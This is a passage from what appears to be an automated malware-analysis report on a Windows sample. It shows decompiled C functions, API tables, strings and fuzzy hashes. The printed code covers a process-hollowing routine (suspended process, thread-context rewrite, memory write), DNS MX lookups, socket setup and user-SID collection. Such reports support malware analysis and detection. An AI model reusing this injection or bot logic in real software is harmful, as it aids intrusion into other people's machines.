				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x40c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740041
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x41366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f004120
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

0x0040c2dc
0x0040c2de
0x0040c2e4
0x0040c2e9
0x0040c2ef
0x0040c482
0x0040c485
0x0040c488
0x0040c48b
0x0040c48e
0x0040c491
0x0040c494
0x0040c497
0x0040c499
0x0040c499
0x0040c4a0
0x0040c4a3
0x0040c4a6
0x0040c4a9
0x0040c4d5
0x0040c4d5
0x0040c4d5
0x0040c4c1
0x0040c4c9
0x00000000
0x00000000
0x00000000
0x0040c4cc
0x0040c2fe
0x0040c326
0x0040c329
0x0040c337
0x0040c337
0x0040c337
0x0040c342
0x0040c345
0x0040c348
0x0040c348
0x0040c34e
0x0040c351
0x0040c354
0x0040c357
0x00000000
0x0040c357
0x0040c32b
0x0040c32d
0x0040c330
0x0040c335
0x00000000
0x00000000
0x00000000
0x0040c300
0x0040c300
0x0040c300
0x0040c30b
0x0040c316
0x0040c319
0x0040c31c
0x0040c321
0x0040c35a
0x0040c35d
0x0040c47a
0x0040c47d
0x00000000
0x0040c47d
0x0040c363
0x0040c365
0x0040c36d
0x00000000
0x00000000
0x0040c376
0x0040c37f
0x0040c378
0x0040c378
0x0040c37a
0x0040c37a
0x0040c37a
0x0040c384
0x0040c389
0x0040c38d
0x0040c38d
0x0040c395
0x0040c397
0x0040c397
0x0040c399
0x0040c39c
0x0040c39c
0x0040c39f
0x0040c3ac
0x0040c3ad
0x0040c3b5
0x0040c3b8
0x0040c3bc
0x0040c3bd
0x0040c3c1
0x0040c3c7
0x0040c3c9
0x00000000
0x00000000
0x0040c3cb
0x0040c3d0
0x0040c3d0
0x0040c3cd
0x0040c3cd
0x0040c3cd
0x00000000
0x0040c3c3
0x0040c3c3
0x0040c3d1
0x0040c3d1
0x0040c3d4
0x0040c3d8
0x0040c3da
0x0040c3da
0x0040c3e3
0x0040c3eb
0x0040c3f0
0x0040c3f2
0x0040c3f2
0x0040c3fd
0x0040c405
0x0040c408
0x0040c419
0x0040c41a
0x0040c41d
0x0040c421
0x0040c42a
0x0040c42b
0x0040c430
0x0040c436
0x0040c43b
0x0040c443
0x0040c448
0x0040c44b
0x0040c453
0x0040c456
0x0040c456
0x0040c45c
0x0040c46c
0x0040c475
0x0040c45e
0x0040c45e
0x0040c467
0x0040c467
0x00000000
0x0040c45c
0x0040c3c1

APIs

Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA

GetTickCount.KERNEL32 ref: 0040C31F
GetTickCount.KERNEL32 ref: 0040C32B
GetTickCount.KERNEL32 ref: 0040C363
GetTickCount.KERNEL32 ref: 0040C378
GetTickCount.KERNEL32 ref: 0040C44D
InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0040C4E0), ref: 0040C4C1
CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC

Strings

localcfg, xrefs: 0040C2DD

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
String ID: localcfg
API String ID: 1553760989-1857712256
Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14

Uniqueness

Uniqueness Score: -1.00%

Function 0223F565, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(0223CC6D), ref: 0223F59D
socket.WS2_32(00000002,00000001,00000000), ref: 0223F5B7
closesocket.WS2_32(00000000), ref: 0223F5C5

Strings

time_cfg, xrefs: 0223F573
ps, xrefs: 0223F5C5, 0223F5F0
^s, xrefs: 0223F619

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: closesockethtonssocket
String ID: ps$time_cfg$^s
API String ID: 311057483-2063425486
Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
Instruction ID: db44a9c1c71046cb8385b8d4bfdbc62a43f82b035ba99c2974b402884acbcefa
Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
Instruction Fuzzy Hash: 693180B2D10219ABDB11DFA4ED89DEE7BBCEF89310F104166F915D3150E7B08A858FA4

Uniqueness

Uniqueness Score: -1.00%

Function 02233042, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97memorylibrarynetworkCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 02233051
LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02233061
GetProcAddress.KERNEL32(00000000,00410408), ref: 0223307E
RtlAllocateHeap.NTDLL(00000000), ref: 0223309F
htons.WS2_32(00000035), ref: 022330D8
inet_addr.WS2_32(?), ref: 022330E3
gethostbyname.WS2_32(?), ref: 022330F6
HeapFree.KERNEL32(00000000), ref: 02233136

Strings

iphlpapi.dll, xrefs: 0223304B, 02233050, 02233060

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
String ID: iphlpapi.dll
API String ID: 2869546040-3565520932
Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
Instruction ID: 7bab338c5aae34ee96606bb0f3c240cc349531e8c496ec2f38fe6455532af3d6
Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
Instruction Fuzzy Hash: CB31E7B1E20307ABDB12DBF4DC44B9E7BB8EF04725F1441A5E514E31A4DB74D6418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402D21, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85
memorylibrarystringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00402D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}

0x00402d31
0x00402d32
0x00402d33
0x00402d39
0x00402d3a
0x00402d40
0x00402d44
0x00402d5b
0x00402d61
0x00402d69
0x00402d54
0x00000000
0x00402d54
0x00402d6b
0x00402d6c
0x00402d6f
0x00402d70
0x00402d71
0x00402d72
0x00402d74
0x00402d7b
0x00000000
0x00000000
0x00402d7d
0x00402d80
0x00402d83
0x00402d88
0x00402deb
0x00000000
0x00402deb
0x00402d90
0x00402d95
0x00000000
0x00000000
0x00402da6
0x00402daa
0x00000000
0x00000000
0x00402db0
0x00402db9
0x00402dc1
0x00402dc7
0x00402dcb
0x00402dd1
0x00402dd4
0x00402dd9
0x00402de0
0x00402ddb
0x00402ddb
0x00402ddb
0x00402de2
0x00402de2
0x00402de4
0x00402de6
0x00000000
0x00402dea
0x00402d4a
0x00402d52
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
LoadLibraryA.KERNEL32(?), ref: 00402D4A
GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
HeapAlloc.KERNEL32(00000000), ref: 00402DA0
lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB

Strings

dnsapi.dll, xrefs: 00402D29
DnsQuery_A, xrefs: 00402D5B

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
String ID: DnsQuery_A$dnsapi.dll
API String ID: 3560063639-3847274415
Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC9, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x412e08 != 0) {
					L14:
					return 0x412e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
					}
					L10:
					_t17 = 0x412e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x412e09;
						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
							 *((char*)(_t18 + 0x412e08)) = 0x5c;
							 *((char*)(_t18 + 0x412e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x412e08);
				if( *_t8() == 0 ||  *0x412e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}

0x00406cc9
0x00406cd6
0x00406dbe
0x00406dc1
0x00406dc1
0x00406cee
0x00406cfb
0x00406d12
0x00406d1c
0x00406d40
0x00406d60
0x00406d69
0x00406d6e
0x00406d6e
0x00406d86
0x00406d8f
0x00406d98
0x00406d99
0x00406d99
0x00406d9e
0x00406d9f
0x00406d9f
0x00406da1
0x00406da4
0x00000000
0x00406da6
0x00406da6
0x00406daf
0x00406db1
0x00406db8
0x00406db8
0x00000000
0x00406daf
0x00406da4
0x00406cfd
0x00406cfe
0x00406d03
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
GetProcAddress.KERNEL32(00000000), ref: 00406CEE
GetSystemDirectoryA.KERNEL32 ref: 00406D14
GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B

Strings

kernel32, xrefs: 00406CE2
GetSystemWow64DirectoryA, xrefs: 00406CDD
C:\Windows\SysWOW64\, xrefs: 00406CC9, 00406CD1, 00406CFE, 00406D05, 00406D13, 00406D1E, 00406D2A, 00406D42, 00406D5F, 00406D85
PromptOnSecureDesktop, xrefs: 00406CDC, 00406D36, 00406D58, 00406D68, 00406D7E, 00406D8E

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Directory$AddressHandleModuleProcSystemWindows
String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$PromptOnSecureDesktop$kernel32
API String ID: 1082366364-2834986871
Opcode ID: d09e83db478442fd4945e9c658ec75f055a3aceb6853e703a7e434fe43434249
Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
Opcode Fuzzy Hash: d09e83db478442fd4945e9c658ec75f055a3aceb6853e703a7e434fe43434249
Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040977C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82
threadinjectionprocessCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				void* _t33;

				_t46 = __ecx;
				E0040EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread);
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}

0x0040977c
0x0040978f
0x004097a9
0x004097b9
0x004097cf
0x004097e1
0x004097f3
0x00409811
0x00409819
0x0040981c
0x004097f6
0x004097f9
0x00000000
0x004097f9
0x00409839
0x00000000
0x00000000
0x0040983e
0x00409856
0x00000000
0x00000000
0x0040985b
0x00000000
0x00409863
0x004097f5
0x004097f5
0x00000000
0x004097f5
0x004097bb
0x00000000

APIs

CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,PromptOnSecureDesktop), ref: 004097B1
GetThreadContext.KERNEL32(?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097EB
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097F9
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 00409831
SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040984E
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040985B

Strings

PromptOnSecureDesktop, xrefs: 00409785
D, xrefs: 004097A9

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
String ID: D$PromptOnSecureDesktop
API String ID: 2981417381-1403908072
Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 02236761, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 022367AC
htonl.WS2_32(?), ref: 022367C8
htonl.WS2_32(?), ref: 022367D7
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 022368DA
ExitProcess.KERNEL32 ref: 022369A5

Strings

localcfg, xrefs: 0223697D
except_info, xrefs: 02236978

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Processhtonl$CurrentExitHugeRead
String ID: except_info$localcfg
API String ID: 1150517154-3605449297
Opcode ID: 9038dbc37c9caf9c2cbbe11215500bdd95f01fd026cdf0679b4f32ab6b6dc1c5
Instruction ID: 331815eb2c319e1abeec9399cef8a73d4b256acf4ca29c380ac82933dcb2c6d9
Opcode Fuzzy Hash: 9038dbc37c9caf9c2cbbe11215500bdd95f01fd026cdf0679b4f32ab6b6dc1c5
Instruction Fuzzy Hash: 4C617FB2950208AFDB619FA4DC45FEA77E9FF08300F248066F96CD2161DBB59984CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5F, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

0x00406f6c
0x00406f77
0x00406f82
0x00000000
0x00407047
0x00406f88
0x00406f8a
0x00406f8d
0x00406f8d
0x00406f8f
0x00406f90
0x00406f96
0x00406fb3
0x00406fba
0x00406fc9
0x00407025
0x0040703f
0x00000000
0x00407042
0x00406fd6
0x00406fdb
0x00406fe3
0x00406fe4
0x00406fe7
0x00406fe8
0x00406fef
0x00000000
0x00000000
0x00406ff1
0x00406ff4
0x00406ff4
0x00406ff7
0x00406ff7
0x00406ff9
0x00406ffa
0x00407000
0x0040700e
0x00407016
0x00407019
0x0040701f
0x00000000

APIs

GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
LocalFree.KERNEL32(00000120), ref: 0040701F
wsprintfA.USER32 ref: 00407036

Strings

|, xrefs: 00406FB3
/%d, xrefs: 00407030

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
String ID: /%d$|
API String ID: 676856371-4124749705
Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98

Uniqueness

Uniqueness Score: -1.00%

Function 02232F71, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85memorylibrarystringCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 02232F8A
LoadLibraryA.KERNEL32(?), ref: 02232F9A
GetProcAddress.KERNEL32(00000000,004103F0), ref: 02232FB1
GetProcessHeap.KERNEL32(00000000,00000108), ref: 02232FE9
RtlAllocateHeap.NTDLL(00000000), ref: 02232FF0
lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 0223301B

Strings

dnsapi.dll, xrefs: 02232F79

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
String ID: dnsapi.dll
API String ID: 1242400761-3175542204
Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
Instruction ID: 8fe38bd7fd3d93921c12f6bc419a1d59e3d072ebec21ad0b93dfafdd78aaeb6d
Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
Instruction Fuzzy Hash: 552160B1D5162ABBCB22DB94DC44AAEBBB8EF08B54F008161F905E7114D7B0DA818BD4

Uniqueness

Uniqueness Score: -1.00%

Function 02236F19, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\hhzzhxuz,0223702C), ref: 02236F37
GetProcAddress.KERNEL32(00000000), ref: 02236F3E
GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02236F64
GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02236F7B

Strings

C:\Windows\SysWOW64\, xrefs: 02236F19, 02236F21, 02236F4E, 02236F55, 02236F63, 02236F6E, 02236F7A, 02236F92, 02236FAF, 02236FD5
PromptOnSecureDesktop, xrefs: 02236F86, 02236FA8, 02236FB8, 02236FCE, 02236FDE
\\.\pipe\hhzzhxuz, xrefs: 02236F20

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Directory$AddressHandleModuleProcSystemWindows
String ID: C:\Windows\SysWOW64\$PromptOnSecureDesktop$\\.\pipe\hhzzhxuz
API String ID: 1082366364-1950856576
Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
Instruction ID: 7c5c03c6e501f3f4c49c27bd2fb8e98c4084557f9e2486ffe3f206ac42a36ca0
Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
Instruction Fuzzy Hash: C42123A1B513417AF72353A1AD88FFB2E5D8B42754F088095F848E6098CFD9C49686AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406BA7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00406BA7(CHAR* _a4) {
				long _v8;
